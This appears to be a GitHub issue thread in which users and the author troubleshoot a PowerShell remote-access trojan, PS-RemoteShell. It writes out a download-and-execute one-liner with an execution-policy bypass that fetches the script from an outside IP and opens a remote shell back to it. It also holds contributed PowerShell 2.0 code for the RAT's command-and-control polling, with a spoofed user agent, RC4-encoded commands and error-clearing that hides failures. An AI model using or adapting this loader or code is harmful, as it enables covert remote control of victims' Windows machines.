Error ?

[Souhardya]

Sorry bout this bit lame tho :- Getting this error while executing in my VM :)

Unexpected token ':$($Domain)\$($env:username)' in expression or statement. At line:19 char:59

• return $($Arch) - $($Target):$($Domain)\$($env:username) <<<<
  • CategoryInfo : ParserError: (:$($Domain)\$($env:username):String) [], ParentContainsErrorRecordExceptio n
  • FullyQualifiedErrorId : UnexpectedToken

The term 'PS-RemoteShell' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:130

• powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://185.159.82.240/PS-RemoteShell.ps1'); PS -RemoteShell <<<< -ip 185.159.82.240 -port 8080 -Key test -Delay 2000
  • CategoryInfo : ObjectNotFound: (PS-RemoteShell:String) [], CommandNotFoundException
  • FullyQualifiedErrorId : CommandNotFoundException

Can you please point out if I am missing something ?

Thanks in advance :) Always been a huge admirer of your codes

[Mind0xP]

That's the same error I'm getting...

[Mr-Un1k0d3r]

You are going to provide me more information.

If you run the following command powershell -exec bypass Write-Output (New-Object Net.WebClient).DownloadString('http://yourpayload/path'); does it show the powershell script?

If it doesn't your path is not good. The error "The term 'PS-RemoteShell' is not recognized as the name of a cmdlet" is caused when the script was not properly loaded / not found.

[Mind0xP]

Hi, I have just moved "PS-RemoteShell.ps1" to the download folder and run the command you gave me. got this output:

[Mr-Un1k0d3r]

i've seen cases where it generate an error but it actually work even if it throw an error. Can you confirm that script is not running afterward?

We are tracking down the reason why it's displaying errors like that but still execute just fine

[Mind0xP]

well, I'm not getting any shell back, tried few windows 7 machines with a stable connection, none worked.

[GILoe]

tried few windows 7 machines

PS-RemoteShell.ps1 uses Invoke-WebRequest cmdlet, that is powershell v3.0+, which is NOT the default one on Windows 7, that come with powershell v2.0. That along the fact that we reset the $error variable, hence we see no errors printed.

You can replace the aforementioned cmdlet by creating and customising an instance of [System.Net.WebRequest], if you need to work on windows 7. [done that]

[Mr-Un1k0d3r]

Hi it was originally design to avoid using System.Net.WebRequest but I guess I can make a PS 2 switch in the code to add support for PS 2.

Also thanks for pointing out the issue with the $error been reset I'll address that too.

[GILoe]

Unfortunately I found no other way for PS 2 other than [System.Net.WebRequest]. If it is of any convinience :

Try {
    $request = [System.Net.WebRequest]::Create($Url)
    $request.Method = "POST"
    $request.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
    $request.Timeout = 10000 #milliseconds
    $request.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
    try
    {
        $requestStream = $request.GetRequestStream()
        $streamWriter = New-Object System.IO.StreamWriter($requestStream)
        $streamWriter.Write($BodyData)
    }
    finally
    {
        if ($null -ne $streamWriter) { $streamWriter.Dispose() }
        if ($null -ne $requestStream) { $requestStream.Dispose() }
     }
    $resp = $request.GetResponse().getResponseStream()
    $reader = New-Object System.IO.StreamReader($resp)
    $Data = $reader.ReadToEnd()
    #$Data = Invoke-WebRequest -Uri $Url -Method POST -Body $BodyData -UserAgent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" -TimeoutSec 10 -UseBasicParsing
    $Cmd = RC4-DecodeBase64 -Buffer $Data -Key $Key
} 
Catch {
      $Cmd = ""
      $error.Clear()
}
Finally {
          $resp.Dispose()
          $reader.Dispose()
          $request.ServicePoint.CloseConnectionGroup("") | out-null
}

[Mr-Un1k0d3r]

I added a check and the RAT now support both Invoke-WebRequest and [System.Net.WebRequest]

[GILoe]

Sorry for the long absence. Being trying to make your updated stager.ps1 work on a windows 7 machine (powershell 2.0) with no success. Same as before, no error but no functionality as well.

[Strange that powershell 2.0 does not throw any exceptions on this, messed up microsoft libraries maybe?]

[Mr-Un1k0d3r]

It is kind of hard to troubleshoot your configuration but it should work. Maybe you can add verbose error and try / catch to try to grab the potential error.

Also make sure that your python server configuration match the one you used when you run the powershell script